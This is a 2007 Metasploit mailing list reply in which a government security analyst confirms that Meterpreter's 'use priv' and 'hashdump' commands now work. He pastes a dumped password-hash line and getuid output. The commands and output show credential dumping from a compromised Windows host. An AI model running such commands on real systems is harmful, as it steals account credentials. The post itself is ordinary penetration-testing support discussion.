Metasploit mailing list archives

Rép. : Re: [framework] Rép . : Re: [framework] Meterpreter hashdump error

From: francis.provencher at msp.gouv.qc.ca (FRANCIS PROVENCHER)
Date: Wed, 11 Apr 2007 09:11:50 -0400

Hi M. Miller,

I dont know why but this morning the hashdump command work.

meterpreter > use priv
meterpreter > hashdump

******:1048:dd98978798329604d958e000538d0bb073:57cf48c938e7ad97be8c4b8cb6d6b7c8:::

Cool!!!

and the getuid work too,

meterpreter > getuid
Server username: francis

 thanks for your support, good work!

Francis Provencher
Minist?re de la S?curit? publique du Qu?bec
Direction des technologies de l'information
Division de la s?curit? informatique
T?l: 1 418 646-3258
Courriel:   Francis.provencher at Msp.gouv.qc.ca

CEH - Certified Ethical Hackers
SSCP - System Security Certified Practitionner
Sec+ - Security +

mmiller at hick.org 2007-04-11 01:05:38 >>>